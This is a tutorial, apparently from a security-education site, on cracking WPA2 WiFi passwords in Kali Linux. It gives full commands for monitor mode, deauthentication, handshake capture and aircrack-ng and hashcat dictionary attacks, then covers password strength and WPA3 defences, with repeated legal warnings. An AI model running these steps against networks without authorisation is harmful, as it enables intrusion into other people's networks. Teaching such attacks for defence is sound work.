⚖️ CLASS RULE — READ THIS: Everything we do in this lesson is on your own network or a lab network you control. Testing on anyone else’s WiFi without written permission is a criminal offence — not a grey area, not a technicality. Criminal. I’m teaching you How to Hack Wifi Password so you understand how to defend networks, not attack strangers. We clear? Good. Let’s learn.

WiFi cracking is probably why most of you ended up on this site. That’s fine — it’s also genuinely one of the best ways to start understanding how cryptography, authentication, and network protocols work. So we’re going to do it properly.

Here’s my promise to you as your teacher: I’m not going to water this down. You’re going to understand exactly what’s happening at each step — not just type commands and hope they work. And when we’re done, you’re going to test your own network and find out whether your WiFi password would last five seconds or five hundred years against this attack.

What you’ll need:

  • Kali Linux (VM, live USB, or native install) — our installation guide
  • A wireless adapter that supports monitor mode (Alfa AWUS036ACH is the standard recommendation)
  • Your own WiFi network to test — or a lab network you control
  • About 30 minutes

How WPA2 Actually Works — And Why You MUST Understand This First

I know you want to jump straight to the terminal. I know. But I’m asking you to read this section first, because students who skip it always get stuck and don’t understand why their attack failed.

WPA2 uses something called a 4-way handshake. When your phone connects to your router, they exchange a series of packets to authenticate each other. Here’s the key insight: this handshake doesn’t contain the password in plain text — but it contains enough cryptographic information to verify whether a guess is correct.

Think of it like a padlock. We don’t have the key, but we have the padlock. We can try keys one by one without needing to touch the lock mechanism — we just see if it opens. The handshake is the padlock. Our wordlist is the bag of keys.

This is called an offline dictionary attack. We capture the handshake once, take it away, and test billions of password guesses against it at full GPU speed. No lockouts. No rate limiting. That’s why your password quality is everything.

Step 1: Enable Monitor Mode on Your Wireless Adapter

Your wireless card normally only pays attention to packets addressed to your device — like how you tune out conversations that aren’t directed at you. Monitor mode is the equivalent of listening to every conversation in the room simultaneously. We need it to capture the handshake between other devices and the router.

Important student note: not all wireless adapters support monitor mode. Built-in laptop WiFi cards usually don’t. The Alfa AWUS036ACH is the community standard recommendation for this. Check yours first with iwconfig.

terminal — Kali Linux
# Check your wireless interface name
iwconfig
# Kill processes that might interfere with monitor mode
sudo airmon-ng check kill
# Start monitor mode (replace wlan0 with your interface name)
sudo airmon-ng start wlan0
# Your interface is now wlan0mon (or similar) in monitor mode
PHY Interface Driver Chipset
phy0 wlan0mon ath9k_htc Atheros AR9271

Step 2: Scan the Area and Identify Your Network

Now we’re going to look at the WiFi landscape around us. This step teaches you something important: your WiFi adapter can see a lot more than your phone’s WiFi settings show you. The raw view from airodump-ng is much richer — BSSID (router MAC address), signal strength, channel, encryption type, and connected clients.

terminal — scan nearby networks
sudo airodump-ng wlan0mon
BSSID PWR Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID
AA:BB:CC:DD:EE:FF -42 230 140 2 6 130 WPA2 CCMP PSK MyHomeNetwork
11:22:33:44:55:66 -78 89 12 0 11 54 WPA2 CCMP PSK Neighbour_WiFi
FF:EE:DD:CC:BB:AA -84 44 3 0 1 54 WPA3 CCMP SAE Office_Network
# Note your target’s BSSID and channel — you’ll need both
# Only proceed against your own network (MyHomeNetwork in this demo)

Step 3: Capture the Handshake

This is the critical step. We need to capture the moment a device authenticates with your router. You have two options: wait patiently for a device to naturally connect (could take a while), or send a deauthentication packet to force a connected device to reconnect. We’ll do both so you understand each approach.

Students often ask: “does the deauth hurt the device?” No — it’s the equivalent of briefly turning WiFi off and on again. The device reconnects automatically within seconds.

terminal — capture handshake (replace values with your network’s)
# Focus on your target network and save the capture
sudo airodump-ng -c 6 –bssid AA:BB:CC:DD:EE:FF -w handshake_capture wlan0mon
# In a second terminal — send deauth to force a reconnect
sudo aireplay-ng –deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Watch for this in airodump-ng output:
[ WPA handshake: AA:BB:CC:DD:EE:FF ]
# That’s it. Handshake captured. Stop the capture with Ctrl+C.

Step 4: Run the Dictionary Attack

Here’s where it gets satisfying. We’ve captured the handshake — now we run password guesses against it. Your first instinct might be to write a clever password guesser. Don’t. The rockyou.txt wordlist that comes with Kali already contains 14 million real-world passwords from previous breaches. Real humans’s real passwords. If your target password is anything humans typically choose, it’s probably in there.

terminal — dictionary attack against captured handshake
# Use rockyou.txt wordlist (pre-installed in Kali Linux)
sudo aircrack-ng handshake_capture-01.cap -w /usr/share/wordlists/rockyou.txt
Aircrack-ng 1.7
[00:00:03] 14344391 keys tested (4,901,823.70 k/s)
Current passphrase: password123
KEY FOUND! [ summer2019 ]
Master Key : 3F A2 B8 …
# That’s a real password being cracked in under 3 seconds.
# summer2019 is in the rockyou wordlist. Millions of passwords like it are.

Step 5: Try hashcat for GPU-Accelerated Cracking

aircrack-ng uses your CPU. hashcat uses your GPU, which is orders of magnitude faster for this kind of work.

terminal — convert cap to hashcat format, then crack
# Convert the capture file to hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap
# Run hashcat with rockyou wordlist
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting…
Speed.#1………: 453.2 MH/s (GPU: RTX 3080)
summer2019:password_found
Session……….: hashcat — Status……: Cracked


What This Means for Your Own WiFi — The Honest Lesson

Now comes the teachable moment. The most important thing I want you to take from this class isn’t the commands — it’s this table. Look at it carefully. Understand viscerally why password length and randomness matter. Because the difference between “cracked in 3 seconds” and “effectively uncrackable” is just a few extra random characters.

Password ExampleTime to Crack (GPU)Verdict
password123InstantIn wordlist
summer20193 secondsIn wordlist
MyDog2018!2-48 hoursWeak
Tr0ub4dor&3Weeks-monthsModerate
k#9mP!vL2@qR7nXCenturiesStrong

How to Actually Secure Your WiFi

  • Use WPA3 — if your router supports it, enable it. WPA3 is resistant to offline dictionary attacks because of how its handshake works
  • Generate a random password — 15+ characters, mixed case, numbers, symbols. Write it on a sticky note on your router if you have to. That’s fine. Random is what matters, not memorable
  • Disable WPS — WiFi Protected Setup has known vulnerabilities that bypass password strength entirely. Turn it off in your router settings
  • Check connected devices regularly — your router’s admin panel shows every connected device. Anything you don’t recognise should be investigated and blocked
  • Guest network for visitors — give guests their own isolated network with a separate password, keeping your main network private

Want to understand the full picture of network security? Our Network Security guide covers everything from packet analysis to MITM attacks. And if you want to go deeper on Kali Linux tools, check our Kali Linux Tools guide.

Frequently Asked Questions

Is it illegal to use aircrack-ng on someone else’s network?

Yes, absolutely. Accessing a WiFi network without authorisation violates the Computer Fraud and Abuse Act (USA), the Computer Misuse Act (UK), and equivalent laws in virtually every country. These are criminal offences, not civil ones. Only test on your own network or one you have explicit written permission to test.

Can WPA3 be cracked the same way?

No. WPA3 uses Simultaneous Authentication of Equals (SAE) instead of the 4-way handshake, which prevents offline dictionary attacks. The attacker would need to be present for every guess, making brute-force attacks dramatically slower and impractical.

Can my ISP tell if someone hacked my WiFi?

Your ISP can see unusual traffic patterns, but they don’t actively monitor for WiFi intrusion. You’d notice it more easily by checking your router’s connected devices list.

Can WiFi passwords be hacked using Kali Linux?

Yes, WiFi passwords can be tested using Kali Linux tools like aircrack-ng, but only in controlled environments. Ethical hackers use this method to identify weak passwords and improve network security. Unauthorized access to any network is illegal.

What is the easiest way to test WiFi security in Kali Linux?

The most common method is capturing a WPA/WPA2 handshake using tools like airodump-ng and then performing a dictionary-based password audit. This helps determine if your WiFi password is strong or vulnerable.

How can I protect my WiFi from hackers?

Use WPA3 encryption, create a strong password (16+ characters), disable WPS, update router firmware regularly, and avoid default credentials.

LEAVE A REPLY

Please enter your comment!
Please enter your name here